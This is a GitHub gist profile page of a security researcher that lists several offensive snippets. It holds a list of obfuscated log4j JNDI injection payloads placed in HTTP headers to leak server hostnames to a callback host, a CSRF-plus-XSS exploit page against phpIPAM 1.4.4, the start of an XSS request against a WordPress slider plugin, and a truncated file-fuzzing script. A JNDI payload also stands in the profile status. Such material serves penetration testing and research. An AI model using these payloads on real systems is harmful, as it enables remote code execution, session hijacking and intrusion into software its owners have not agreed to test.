Skip to content

Instantly share code, notes, and snippets.

View incogbyte's full-sized avatar
:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}

incogbyte incogbyte

:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}
126 followers · 72 following
View GitHub Profile
@incogbyte
incogbyte / log4j.txt
Created February 4, 2022 19:22
log4j payloads
User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
Authentication: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}${lower:i}}://${hostName}.{{burp}}/s2edwin}
User-Agent: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Api-Version: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
Referer: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
X-Forwarded-For: ${jndi:ldap://127.0.0.1#{{${hostName}.{{burp}}}}/{{random}}}
@incogbyte
incogbyte / exploit.html
Created January 18, 2022 17:44
XSS + CSRF - PHPIPAM Version 1.4.4
<html>
<body>
<h1> Exploit PHPIPAM </h1>
<p><strong> By: Incogbyte </strong></p>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST">
<input type="hidden" name="container" value="body" />
<input type="hidden" name="placement" value="top" />
<input type="hidden" name="sectionid" value="2&apos;&gt;&lt;input&#32;onpointerleave&#61;&quot;alert&#40;1&#41;&quot;&gt;incogbyte&lt;&#47;input&gt;&lt;script&gt;alert&#40;&apos;incogbyte&apos;&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="original&#45;title" value="Search&#32;for&#32;free&#32;subnets&#32;in&#32;section&#32;" />
@incogbyte
incogbyte / request.md
Last active December 11, 2022 11:49
xss huge-it v4.0.8 
POST /wp-admin/admin.php?page=hugeit_slider HTTP/1.1
Host: localhost:8000
Content-Length: 53
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8000
@incogbyte
incogbyte / google_cloud_debian_to_kali.md
Last active March 29, 2025 17:52
Convert Debian 10 or Ubuntu > 12 to Kali Linux on Google Cloud or Any Debian

Convert Debian 10 to Kali Linux on Google Cloud or Any Debian

After you create an account on Google Cloud, and create your VPS using Debian 10, follow the below guide to convert your Debian to Kali Linux Latest Version:

Convert Debian to Kali:

Step 1:

apt-get update -y && apt-get full-upgrade -y && apt-get dist-upgrade -y && apt autoremove -y && apt autoclean

@incogbyte
incogbyte / juicy.sh
Created January 9, 2020 15:14
fast juicy files with tomnomnom wordlist and ffuf tool
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt
filename="$1"
while read -r line; do
name="$line"